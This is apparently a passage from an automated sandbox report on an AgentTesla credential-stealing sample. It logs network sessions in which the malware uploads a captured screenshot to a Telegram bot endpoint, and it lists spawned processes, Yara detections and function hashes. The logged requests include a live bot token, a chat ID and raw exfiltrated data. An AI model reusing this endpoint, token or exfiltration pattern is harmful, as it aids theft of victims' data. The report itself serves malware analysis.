2024-10-03 07:21:15 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:21:15 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:21:15 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:21:15 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:21:15 UTC	597	OUT	Data Raw: ad 57 f7 98 da a5 07 55 c6 72 49 19 19 39 ce 71 5c d6 bf 04 b6 da f5 f4 33 4f e7 ca b3 36 f9 76 ed de 73 c9 c0 e9 50 db ea 5a 85 ac d2 4d 6d 7d 73 0c b2 f3 23 c7 2b 2b 3f 39 e4 83 cd 56 77 79 1d 9d d8 b3 b1 cb 33 1c 92 7d 4d 16 01 2b a9 f0 dc 97 16 da 5c 52 d8 97 59 e5 d4 a2 86 4d 9d 59 36 9c 29 f5 04 e7 23 be 2b 96 a9 ed 6f 6e ec f7 fd 96 ea 68 3c c5 da fe 54 85 77 0f 43 8e a2 86 07 51 23 3c b6 1a d6 9d 6f 71 2c 89 16 5a 2b 59 17 11 47 18 97 21 a3 23 39 63 90 39 0b c3 1e 4d 25 8d d3 d9 78 b3 49 d3 20 64 29 6a e9 03 92 8a df 3b 30 32 11 91 c1 cf 19 1c e0 57 3d 16 ad a9 45 1c 31 25 f4 fe 4c 2c 1e 38 99 cb 46 a4 1c 83 b4 f1 d7 da ab 2c f3 25 c0 b8 49 5d 66 0d bc 48 18 86 0d eb 9f 5a 2c 3b 9d 96 8a ce 90 69 50 46 58 5a dd c9 74 2f 14 7d d7 00 7f 17 d1 79 1e Data Ascii: WUrI9q\3O6vsPZMm}s#++?9Vwy3}M+\RYMY6)#+onh<TwCQ#<oq,Z+YG!#9c9M%xI d)j;02W=E1%L,8F,%I]fHZ,;iPFXZt/}y
2024-10-03 07:21:15 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 61 63 63 61 37 36 64 64 34 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd36acca76dd4a--
2024-10-03 07:21:16 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:21:16 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.8	49728	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:21:27 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dce35a771aea67 Host: api.telegram.org Content-Length: 66183 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:21:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:21:27 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 35 61 37 37 31 61 65 61 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 35 61 37 37 31 61 65 61 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 33 2f 32 30 32 34 20 30 33 3a 32 31 3a 32 36 0a 55 73 65 72 Data Ascii: -----------------------------8dce35a771aea67Content-Disposition: form-data; name="chat_id"5928888099-----------------------------8dce35a771aea67Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/03/2024 03:21:26User
2024-10-03 07:21:27 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:21:27 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:21:27 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:21:27 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:21:27 UTC	597	OUT	Data Raw: ad 57 f7 98 da a5 07 55 c6 72 49 19 19 39 ce 71 5c d6 bf 04 b6 da f5 f4 33 4f e7 ca b3 36 f9 76 ed de 73 c9 c0 e9 50 db ea 5a 85 ac d2 4d 6d 7d 73 0c b2 f3 23 c7 2b 2b 3f 39 e4 83 cd 56 77 79 1d 9d d8 b3 b1 cb 33 1c 92 7d 4d 16 01 2b a9 f0 dc 97 16 da 5c 52 d8 97 59 e5 d4 a2 86 4d 9d 59 36 9c 29 f5 04 e7 23 be 2b 96 a9 ed 6f 6e ec f7 fd 96 ea 68 3c c5 da fe 54 85 77 0f 43 8e a2 86 07 51 23 3c b6 1a d6 9d 6f 71 2c 89 16 5a 2b 59 17 11 47 18 97 21 a3 23 39 63 90 39 0b c3 1e 4d 25 8d d3 d9 78 b3 49 d3 20 64 29 6a e9 03 92 8a df 3b 30 32 11 91 c1 cf 19 1c e0 57 3d 16 ad a9 45 1c 31 25 f4 fe 4c 2c 1e 38 99 cb 46 a4 1c 83 b4 f1 d7 da ab 2c f3 25 c0 b8 49 5d 66 0d bc 48 18 86 0d eb 9f 5a 2c 3b 9d 96 8a ce 90 69 50 46 58 5a dd c9 74 2f 14 7d d7 00 7f 17 d1 79 1e Data Ascii: WUrI9q\3O6vsPZMm}s#++?9Vwy3}M+\RYMY6)#+onh<TwCQ#<oq,Z+YG!#9c9M%xI d)j;02W=E1%L,8F,%I]fHZ,;iPFXZt/}y
2024-10-03 07:21:27 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 35 61 37 37 31 61 65 61 36 37 2d 2d 0d 0a Data Ascii: -----------------------------8dce35a771aea67--
2024-10-03 07:21:28 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:21:28 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Target ID:	0
Start time:	03:17:18
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\08(2)_00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\08(2)_00.exe"
Imagebase:	0xf00000
File size:	307'712 bytes
MD5 hash:	4FDF9741C120F25E66BA4CF07067C5D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1432692321.0000000004319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:17:20
Start date:	03/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xe60000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.3868083116.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3869447768.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3869447768.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	03:17:32
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe"
Imagebase:	0x3d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:17:32
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:17:40
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe"
Imagebase:	0xe00000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:17:40
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 032ABBF0 Relevance: 9.3, Strings: 5, Instructions: 3072COMMON

Download Yara Rule

Strings

:.t, xrefs: 032AE68C
09.t, xrefs: 032AE43B
(:.t, xrefs: 032AE55E
H;.t, xrefs: 032AE318
Ld.t, xrefs: 032AE379

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID: (:.t$09.t$H;.t$Ld.t$:.t
API String ID: 0-110458475
Opcode ID: 7f38bd5847f4c3ad4012ab462deb1a7ef757135a22800bcabab4fbf649f0ef36
Instruction ID: 522ee57520c316e4ef0ae4473036c7e15c2375a4a5ac7ce3d4a5c51ed5427e04
Opcode Fuzzy Hash: 7f38bd5847f4c3ad4012ab462deb1a7ef757135a22800bcabab4fbf649f0ef36
Instruction Fuzzy Hash: 3C534E70A00218AFEB299B90DC55BADBB76FF89700F5040D9E6096B2D0CF71AE84DF55

Function 032ABBD0 Relevance: 9.3, Strings: 5, Instructions: 3036COMMON

Download Yara Rule

Strings

:.t, xrefs: 032AE68C
09.t, xrefs: 032AE43B
(:.t, xrefs: 032AE55E
H;.t, xrefs: 032AE318
Ld.t, xrefs: 032AE379

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID: (:.t$09.t$H;.t$Ld.t$:.t
API String ID: 0-110458475
Opcode ID: a1497d704ebd0ffafea91c541743a492a7f5f05626d331d7699c7226ce7c1a4a
Instruction ID: e9bbd4a14ede6105e6d0e35a6733c91298c2fe456595e1a4e5e5bf370dfbde74
Opcode Fuzzy Hash: a1497d704ebd0ffafea91c541743a492a7f5f05626d331d7699c7226ce7c1a4a
Instruction Fuzzy Hash: 5A534E70A00218AFEB299B90DC55BADBB76FF89700F5040D9E6096B2D0CF71AE84DF55

Function 032AA5E0 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

d, xrefs: 032AA72C

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 25c046afda82efba70cf404a05786a20b5a87ce4b776cac74a65d624879fd284
Instruction ID: 67974a42e2eed0ac439dbe5cbf3e7257b4b95f9d3e1b25dec574ea457a9ae734
Opcode Fuzzy Hash: 25c046afda82efba70cf404a05786a20b5a87ce4b776cac74a65d624879fd284
Instruction Fuzzy Hash: C3615875A10A0ACFCB15CF59C4C08AAFBBAFF88310B54C66AD91997615DB30F891CF90

Function 032A6688 Relevance: 1.4, Instructions: 1386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 135bf93088978a0baaf432f2e1bf5eeb17298720835e6098d8c670fd53b7b49b
Instruction ID: 5178ad9a8b5abe8b275c975d1a8af7ce1b840c0858f8ceb4582aef2236b05056
Opcode Fuzzy Hash: 135bf93088978a0baaf432f2e1bf5eeb17298720835e6098d8c670fd53b7b49b
Instruction Fuzzy Hash: F0E26F34A00229DFEB299B54DC55BAEBB72FBC8301F504198DA0AA73A4DF312D91DF51

Function 032AFAF8 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8eec2f4d84e9ba240207e8c64ad477bb0499cc15df5418615ed60ab8d1cc24
Instruction ID: 9e3f9f0a1ccd70cc1f7c4a628970784e9347894ce693d51a0941f4186001ebba
Opcode Fuzzy Hash: 4b8eec2f4d84e9ba240207e8c64ad477bb0499cc15df5418615ed60ab8d1cc24
Instruction Fuzzy Hash: 43C1A334B106169FCB15DF69C984AAEFBF6BF88700B18816AD905EB355DB34DC42CB90

Function 032A62E7 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e115a9f78d0f4e676c9bac8a5c65fcf60465c19bd4da9c61943dd2f1dc634d2e
Instruction ID: affdc0f6eb06c63cccd9439fbc49b7e1c34878ad93db92f9a353d43c8b5a055e
Opcode Fuzzy Hash: e115a9f78d0f4e676c9bac8a5c65fcf60465c19bd4da9c61943dd2f1dc634d2e
Instruction Fuzzy Hash: E3B16E746003129FD705DF68D884A59BBF2FF89211B048698E84A8B776DB30FC49CB91

Function 032A9E18 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf6a887435913da2141a7f14fe747796ca7a01033a078a10255c08febabf4436
Instruction ID: 1c09e532e16a4335150bcc5d75ec61d8d3fa84e99e3fced73cfc7b7e0a04f176
Opcode Fuzzy Hash: cf6a887435913da2141a7f14fe747796ca7a01033a078a10255c08febabf4436
Instruction Fuzzy Hash: EE81C720724A1A9FEB18DA3D4414B3A75EA7FC9B5171880A6D906CB360EF70CCC5D7A3

Function 032A6340 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b269cd8e58dddd41cc478b60174babde2e13a96c684f281ce5dc5ab611ae54b9
Instruction ID: a4dd8d292c2c5cb057731f85a8a797ba7c21b4bb94673e34093715400eeb6209
Opcode Fuzzy Hash: b269cd8e58dddd41cc478b60174babde2e13a96c684f281ce5dc5ab611ae54b9
Instruction Fuzzy Hash: E3A16D346003129FDB19DF68D48495DBBF2FF882117548A98E94A8B776DB30FC49CB91

Function 032AFAE9 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1431898207.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_08(2)_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149dc630dcd078db71f925654537a378e5126e2b71d20844baaa59d221ba6974
Instruction ID: ab1db1cef6fe1f717883a88ddeab4d60f8ffb5ad4c2be7a6f99fd2d18ace4400
